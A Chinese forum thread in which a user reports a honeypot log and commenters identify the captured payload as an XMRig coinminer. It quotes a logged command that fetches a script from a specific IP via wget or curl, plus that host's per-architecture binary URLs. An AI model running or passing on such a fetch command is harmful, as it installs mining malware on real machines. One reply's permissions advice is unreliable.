被爆破后，听了佬的建议，装了个蜜罐，然后有趣的事情发生了。

昨天被爆破了，在佬的建议下装了个蜜罐，然后发现了好多有趣的事情；

今天坚持log，发现一条记录

wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh

看上去像是要从这里下个sh

http://94.156.177.109/sh

然后我把sh下下来了，代码有点多，发不出来；

看了下，这个语言不是很懂，大概意思应该是记录目标主机的系统状态，用户状态，并且根据不同的系统，下载对应的文件，下载地址分别是

# x86_64
http://94.156.177.109/x86_64

# i686
http://94.156.177.109/i686

# aarch64
http://94.156.177.109/aarch64

# arm7
http://94.156.177.109/arm7

文件是下下来了，但是我打不开，有没有懂的佬，教一教下一步怎么搞？

xzxc · 2024-10-29 15:32:21

估计是安装挖矿程序，或者安装勒索病毒

newcomer · 2024-10-29 15:32:21

把wget的权限设置为755

bfloat16 · 2024-10-29 15:32:21

下载http://94.156.177.109/sh火绒秒杀

下载下来的内容：

下载http://94.156.177.109/x86_64，还是秒杀

UPX加壳

上IDA撅了

XMRIG 6.21.2

evil · 2024-10-29 15:32:21

没什么好看的，不是挖矿就是烂大街的DDOS远控

flf168 · 2024-10-29 15:32:21

能直接举报这个ip，封了它么

Harvey · 2024-10-29 15:37:43

看了一下是CoinMiner挖矿病毒

chln · 2024-10-29 15:52:43

后面应该是,拷贝替换系统中的对应的其他东西,然后运行吧

feng_ice · 2024-10-29 17:19:39

这个就是互联网上经常扫的挖矿

2024-10-29 18:01:56

不是爆破吗蜜罐还能抓到这个？ http://94.156.177.109/sh